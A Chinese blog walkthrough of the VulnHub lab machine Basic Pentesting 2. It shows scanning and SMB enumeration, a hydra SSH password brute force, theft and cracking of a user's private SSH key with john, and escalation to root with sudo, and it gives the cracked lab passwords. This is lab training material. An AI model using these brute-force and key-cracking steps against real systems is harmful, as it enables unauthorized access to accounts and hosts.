Basic Pentesting:2-打靶渗透【附代码】(权限提升)

最新推荐文章于 2024-11-09 15:56:43 发布
最新推荐文章于 2024-11-09 15:56:43 发布
阅读量764 收藏 13
点赞数 8
分类专栏: 打靶日常 文章标签: 笔记 学习 网络安全 网络 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52487093/article/details/141070448
版权

靶机下载地址:

https://www.vulnhub.com/entry/basic-pentesting-2,241/icon-default.png?t=N7T8https://www.vulnhub.com/entry/basic-pentesting-2,241/

1. 主机发现+端口扫描+目录扫描+敏感信息获取

1.1. 主机发现

nmap -sn 192.168.7.0/24|grep -B 2 '08:00:27:1D:4A:27'

1.2. 端口扫描

nmap -p- 192.168.7.88

1.3. 目录扫描

dirb http://192.168.7.88

1.4. 敏感信息收集

whatweb http://192.168.7.88

2. WEB打点寻找漏洞点

2.1. 进入80端口

无有用信息

2.2. 拼接扫描到的目录

拼接/development

存在两个文件,逐个点开看看

dev.txt:

j.txt:

信息总结:
提了SMB版本以及配置完成的信息 -》正好开放了445端口,等等可以试试看
K用户回复J用户 -》
1.说他一直在审核 /etc/shadow 的内容
2.K说J存在着弱密码问题

2.3. 445端口

利用kali的enum4linux工具枚举SMB服务中的信息;

enum4linux -a -o 192.168.7.88

成功的排列出两个用户名信息,也符合上述中交流的J和K;

kay
jan

2.4. Getshell

我们已知账户名,而且又知道J用户存在弱密码问题,那就利用kali的九头蛇爆破试试咯

hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://192.168.7.88 -t 64 
# 得知密码为
# armando

3. 权限提升

3.1. 连接ssh

1.连接ssh

ssh jan@192.168.7.88

2.老规矩,查看是否存在特权命令,或是否存在具有root\all权限的可利用的可执行文件,没有利用点

suod -l

3.逐个查看可疑的文件 -> /home/kay/目录存在pass.bak文件,但无访问权限;

但是可以访问kay用户的ssh私钥文件

cd .ssh
ls -al
cat id_rsa

3.复制私钥至本地,赋予执行权限【注意格式问题】

chmod +x 1.txt

4.通过python转换id_rsa为可以识别的信息,然后利用字典解密该信息,来获取文件密码。

python /usr/share/john/ssh2john.py 1 > ssh_login
john --wordlist=/usr/share/wordlists/rockyou.txt ssh_login

获得密钥:beeswax

5.尝试登录ssh -> 成功

ssh -i 1 kay@192.168.7.88

3.2. 尝试提权

1.老规矩,查看是否存在特权命令,密码不大行,看看文件吧

sudo -l

2.有一个pass.bak文件,查看一下

cat pass.bak
# 有一段代码
heresareallystrongpasswordthatfollowsthepasswordpolicy$$

这个可能是kay用户的密码,尝试使用命令sudo -l输入密码成功 -> 权限是all,直接提权 ->成功

sudo su

橙则Kucei
关注
专栏目录
BasicPentesting:从TryHackMe清除基本渗透测试室
02-12
基本的沉思 IP: 10.10.251.73 斯坎尼格 开放端口 22 80 139 445 8009 8080 问题与解答 Web服务器上的隐藏目录( development ,可通过GoBuster找到) 用户名(通过enum4linux找到jan和kay ) 密码( jan: armando使用SSH通过Hydra找到) 密码( kay: beeswax在linPEAS中获得带有scalloning的rsa-id后,通过John通过发现的kay: beeswax ) 上一个密码(以下是heresareallystrongpasswordthatfollowsthepasswordpolicy$$在凯氏登录中找到的输入密码heresareallystrongpasswordthatfollowsthepasswordpolicy$$密码) 在ssh服务器中,使用与John一起
python-pentesting:python-pentesting工具
05-04
主要脚本是pentesting-tool.py,您需要使用python 2.7执行。还需要安装requeriments.txt和其他模块,例如python-msfrpc 从requeriments.txt安装依赖项 点安装-r requirements.txt 介绍 该工具允许获取有关特定IP或域...
[Vulnhub] basic_pentesting 2
weixin_63231007的博客
07-12 820
目录信息搜集 S2-052漏洞利用 Hydra爆破jan密码(1) vim读取密码 (2) ssh公钥私钥获取身份登录凭据下载链接:Basic Pentesting: 2 ~ VulnHubnmap -sP 192.168.236.0/24 扫描一下靶机ipnetdiscover -i eth0 -r 192.168.1.0/24靶机ip : 192.168.236.138nmap -A 192.168.236.138 扫描一下靶机的具体信息。 收集靶场环境的服务和端口信息我们可以看见139和4...
Vulnhub靶场训练笔记之——basic_pentesting_2
happy_no_fw的博客
11-29 522
​镜像下载:https://download.vulnhub.com/basicpentesting/basic_pentesting_2.tar.gz
【vulnhub】Basic Pentesting :2靶机
wbplife的博客
08-06 450
445端口:靶机开放了445端口,可以使用enum4linux工具枚举smb服务的信息,发现两个用户名:kay、jan。发现/home/kay/目录存在pass.bak文件,但目前我们没有访问权限;发现可以访问kay用户的ssh私钥文件。通过ssh2john转换id_rsa为可以识别的信息,然后利用字典解密该信息,来获取文件密码。根据之前的提示,使用hydra工具爆破jan用户的ssh密码,得到:jan:armando。需要输入密码,输入上面pass.bak里的试一下,发现成功。查看pass.bak文件。
Vulnhub靶机:basic_pentesting_2
qq_48904485的博客
02-29 500
运行环境:Virtualbox攻击机:kali(10.0.2.4)靶机:basic_pentesting_2(10.0.2.7)目标:获取靶机root权限和flag靶机下载地址:https://download.vulnhub.com/basicpentesting/basic_pentesting_2.tar.gz。
Stowaway::ghost:Stowaway-用于渗透测试者的多跳代理工具
02-06
Stowaway是一个利用go语言编写,专为渗透测试工作者制作的多级代理工具 用户可使用此程序将外部流量通过多个代理至内网,突破内网访问限制,构造树状节点网络,并轻松实现管理功能 PS:谢谢大家的star,同时欢迎大家...
java红酒网站源码-Pentesting-Pratic-Notes:渗透测试笔记
06-05
java网站源码Pentesting Pratic Notes(备忘单) 文件检测和提取器: file targetFile strings targetFile | grep flag strings -o targetFile strings -a targetFile strings -t d targetFile strings -f ...
java收费钓鱼源码-pentesting:渗透测试
06-05
java收费直播源码令人敬畏的渗透测试 一组很棒的渗透测试资源。 是对计算机系统及其物理基础设施发起授权的模拟攻击以暴露潜在的安全弱点和漏洞的做法。 您的贡献和建议是衷心的 :heart_suit: 欢迎。 请查看更多详细...
java开发oa系统源码下载-advanced-pentesting:高级渗透测试班的笔记
06-05
从不同的终端同时执行接下来的2个。 如果第一个返回 WPA Handshake 在右上角,那么您就成功了! airodump-ng --bssid 08:86:30:74:22:76 -c --write WPAcrack #capture more packets aireplay-ng --deauth 100 -a ...
basic_pentesting_2靶机
weixin_71232352的博客
08-07 269
basic_pentesting_2靶机
【vulnhub靶场】​basic_pentesting_2靶机​提权
qq_46421742的博客
08-03 492
免责声明:本文属于个人笔记,仅用于学习,禁止使用于任何违法行为,任何违法行为与本人无关。
basic_pentesting_2靶场实战【超详细】
weixin_68615160的博客
08-06 548
说是能以 guest 用户进行登录 ,密码为 k1ll0rXX ,但是最后两位忘了,所以用XX代替,需要爆破一下。根据密码样式,最后两位大概率 小写字母+数字,使用kali中crunch工具生成字典。可能是什么加密方式,搜了一下,是 Brainfuck 加密。发现还是无法执行一些命令,执行以下命令,配置环境变量绕过。图片名字指向了31337端口,我们打开它是白色兔子。添加完环境变量之后,直接sudo su,提权成功。很多命令也无法使用,执行export看看。发现其被下载,打开看看。使用工具对其进行解密。
Tryhackme-Basic Pentesting
个人博客
09-14 368
Basic Pentesting 文章目录Basic PentestingTask1 Web App Testing and Privilege Escalation Task1 Web App Testing and Privilege Escalation 1.Deploy the machine and connect to our network 2.Find the services exposed by the machine 3.What is the name of the hidden
BASIC PENTESTING: 1打靶渗透代码】(权限提升)
weixin_52487093的博客
08-05 363
BASIC PENTESTING: 1打靶渗透代码】(权限提升)
BASIC-PENTESTING-1 靶机提权
weixin_41082546的博客
08-11 1275
basic-pentesting-1 https://www.vulnhub.com/entry/basic-pentesting-1,216/ 获取ip地址 端口扫描,服务识别 根据服务版本搜索相关漏洞 通过查看漏洞利用代码我们知道该漏洞利用模块在msf中已有 于是使用msf 搜索漏洞模块并利用 use exploit/unix/ftp/proftpd...
Vulnhub靶场渗透-basic_pentesting_1
paidx0
09-22 759
前言 靶机ip(192.168.110.134) 攻击机ip(192.168.110.127) 网络NAT模式 这次的靶场比较简单,却绕了挺大弯的 信息收集 找到隐藏页 简单翻了一下也没啥可以利用的东西,继续扫隐藏页目录 找到一些看似有用其实没啥用的东西,比如WordPress的登录页,文件包含页 这全都是误导,显然我被骗了,一直在爆破登录页和一个一个文件的看,文件数量太多了浪费很多时间 正确解法 重新回到nmap,这次不偷懒,更详细的扫描一下服务的版本号 nmap -A -v 192.168
批量归一化 BN(Batch Normalization) (减少重复学习 - 加速损失收敛) + 代码实现 ——笔记2.15《动手学深度学习
科研汪小陈的博客
11-08 1109
批量归一化固定小批量中的均值和方差,然后学习出适合的偏移和缩放; 可以加速收敛速度(比如以前学习率是0.01,现在用了批量归一化后,可以调到0.1) 不会出现之前:学习率太大的话,上面 (靠近损失的梯度) 会炸掉; 不会出现之前:学习率太小的话,下面 (靠近数据的模型参数) 会学不动; 每一个层的输出都通过均值方差放在一起了,上下层的分布都差不多是正态分布; 但一般不改变模型精度
Greiner 经典力学(多体系统和哈密顿力学)第十二章 学习笔记(Rotation About a Point)
最新发布
Ivan 的专栏
11-09 1066
上一章是绕定轴转动,这章是绕定点转动。这一章明显上难度了。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

橙则Kucei

感谢您的喜欢

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值